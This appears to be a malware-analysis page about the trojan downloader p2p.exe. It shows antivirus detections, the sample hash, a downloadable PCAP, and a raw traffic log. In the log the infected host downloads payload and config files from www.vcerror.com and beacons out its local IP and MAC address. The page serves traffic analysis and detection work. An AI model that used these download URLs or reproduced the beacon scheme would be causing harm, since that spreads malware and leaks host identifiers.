Text Example

p2p.exe www.vcerror.com Malware Trojan Downloader Dropper PCAP file download traffic analysis

Download Attachments

  • 1 pcap p2p
    Date added: October 26, 2016 5:32 am Added by: admin File size: 25 KB Downloads: 85
SHA256: ef794b9a3b72ae5524e17ecccf330eb16f2cc74f3e7fe7cb2667acefdea4b3a3
File name: p2p.exe
Detection ratio: 47 / 55
Analysis date: 2016-10-26 21:33:06 UTC ( 0 minutes ago )

Antivirus Result Update
AVG Generic37.DEP 20161026
AVware Trojan.Win32.Generic!BT 20161026
Ad-Aware Gen:Trojan.Heur.fmKfXCDIycnj 20161026
AegisLab Troj.Dropper.W32.Injector!c 20161026
AhnLab-V3 Malware/Win32.Generic.N1843405561 20161026
Antiy-AVL Trojan[Dropper]/Win32.Injector 20161026
Arcabit Trojan.Heur.fmKfXCDIycnj 20161026
Avast Win32:Rofin-A [Trj] 20161026
Avira (no cloud) TR/Crypt.FKM.Gen 20161026

 

2016-10-25 23:20:18.175277 IP 192.168.1.102.61056 > 123.57.11.22.80: Flags [P.], seq 0:292, ack 1, win 256, length 292: HTTP: GET /YW/p2p/p2p.exe HTTP/1.1
E..L..@…._…f{9…..PZ.VX….P…….GET /YW/p2p/p2p.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.vcerror.com
Connection: Keep-Alive

2016-10-25 23:20:18.419780 IP 192.168.1.102.61056 > 123.57.11.22.80: Flags [.], ack 2921, win 256, length 0
E..(..@……..f{9…..PZ.W|..%uP….V……..

E..(..@….a…f{9…..PD.=…+.P…C………
2016-10-25 23:20:26.821311 IP 192.168.1.102.61057 > 123.57.11.22.80: Flags [P.], seq 0:103, ack 1, win 256, length 103: HTTP: GET /YW/p2p/ver.dat HTTP/1.1
E…..@……..f{9…..PD.=…+.P…Q…GET /YW/p2p/ver.dat HTTP/1.1
User-Agent: TestIE/1.0
Host: www.vcerror.com
Connection: Keep-Alive

2016-10-25 23:20:26.823460 IP 192.168.1.102.61058 > 13.107.21.200.443: Flags [.], ack 6157, win 32754, length 0
E..(s.@……..f.k……….kx.SP………….
2016-10-25 23:20:26.853146 IP 192.168.1.102.61058 > 13.107.21.200.443: Flags [.], ack 6754, win 32680, length 0
E..(s.@……..f.k……….kx..P………….
2016-10-25 23:20:27.116031 IP 192.168.1.102.61057 > 123.57.11.22.80: Flags [.], ack 318, win 255, length 0

E..(..@….]…f{9…..P….,…P…D;……..
2016-10-25 23:20:27.513843 IP 192.168.1.102.61059 > 123.57.11.22.80: Flags [P.], seq 0:304, ack 1, win 256, length 304: HTTP: GET /YW/config/config.bin?ver=3.180&lip=192.168.32.132&mac=000C29184A91 HTTP/1.1
E..X..@….,…f{9…..P….,…P…….GET /YW/config/config.bin?ver=3.180&lip=192.168.32.132&mac=000C29184A91 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: www.vcerror.com
Connection: Close
Cache-Control: no-cache

2016-10-25 23:20:27.850658 IP 192.168.1.102.61059 > 123.57.11.22.80: Flags [.], ack 1297, win 251, length 0

E..(..@….V…f{9…..P.~.k…[P….A……..
2016-10-25 23:20:30.265197 IP 192.168.1.102.61060 > 123.57.11.22.80: Flags [P.], seq 0:364, ack 1, win 256, length 364: HTTP: GET /YW/txt/hello.txt?ver=3.180&uid=config&lip=192.168.32.132&mac=000C29184A91&p=0&b=0.0.0.0.0&md5=64663066353033343933653362333835 HTTP/1.1
E…..@……..f{9…..P.~.k…[P…….GET /YW/txt/hello.txt?ver=3.180&uid=config&lip=192.168.32.132&mac=000C29184A91&p=0&b=0.0.0.0.0&md5=64663066353033343933653362333835 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: www.vcerror.com
Connection: Close
Cache-Control: no-cache

 

 

Leave a Reply